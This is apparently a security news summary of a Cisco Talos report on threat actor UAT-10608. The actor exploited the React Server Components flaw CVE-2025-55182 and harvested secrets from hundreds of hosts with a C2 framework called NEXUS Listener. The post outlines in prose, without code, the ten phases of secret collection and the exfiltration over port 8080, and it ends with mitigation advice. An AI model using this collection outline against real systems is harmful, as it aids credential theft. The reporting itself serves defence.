A critical flaw in React Server Components just became the fastest credential-harvesting operation in recent memory. Cisco Talos is tracking UAT-10608 — a threat actor that compromised 766 hosts in a single day by chaining CVE-2025-55182 (React2Shell) with an automated secret-extraction framework called NEXUS Listener.
The Vulnerability: React2Shell
CVE-2025-55182 is a pre-authentication remote code execution vulnerability in React Server Components (RSC). The affected code deserializes payloads from inbound HTTP requests without proper validation. An attacker crafts a malicious serialized payload, sends it to a Server Function endpoint — no auth required — and gains arbitrary code execution in the server-side Node.js process.
CVSS score: 10.0. Pre-auth. Zero clicks.
The Harvest: What They Stole
Once inside, the attacker drops a multi-phase harvesting script into /tmp that systematically extracts everything of value. The numbers from the NEXUS Listener dashboard speak for themselves:
- 701 hosts (91.5%) with database credentials
- 599 hosts (78.2%) with SSH private keys
- 196 hosts (25.6%) with AWS credentials
- 87 hosts (11.4%) with live Stripe API keys
- 66 hosts (8.6%) with GitHub tokens
The script runs through ten collection phases: environment variables, JS runtime secrets, SSH keys, pattern-matched tokens, shell history, cloud metadata, Kubernetes tokens, Docker configs, process command lines, and full process environments. Each phase sends data back to the C2 in chunks over port 8080.
The NEXUS Listener Framework
This isn't a one-off script. UAT-10608 operates a fully featured web-based C2 called NEXUS Listener that provides:
- Real-time statistics on compromised hosts and credential counts
- Search and filtering across all exfiltrated data
- Uptime tracking for the operation itself
Cisco Talos gained access to an exposed NEXUS Listener instance, which is how we know the full scope.
Why This Matters
The stolen secrets aren't just passwords. They're infrastructure takeover kits. AWS credentials lead to cloud account compromise. SSH keys enable lateral movement across networks. Stripe keys mean direct access to payment flows. GitHub tokens open the door to supply chain attacks.
And the targeting is indiscriminate — automated scanning of public-facing Next.js apps, likely via Shodan or Censys, followed by exploitation at scale.
What You Should Do Right Now
- Patch React/Next.js immediately — Update to a non-vulnerable version of React Server Components
- Audit environment variable exposure — Check what secrets your Node.js processes can access
- Rotate all credentials — If you even think you might be affected, rotate everything
- Enable AWS IMDSv2 — Prevent metadata service abuse
- Replace reused SSH keys — Unique keys per host, always
- Deploy secret scanning — Catch exposed tokens in code and logs
- Use WAF/RASP protections — For Next.js apps in particular
- Enforce least-privilege — Across containers, cloud roles, and runtime permissions
Source: Cisco Talos Intelligence Group. Full report: UAT-10608 Analysis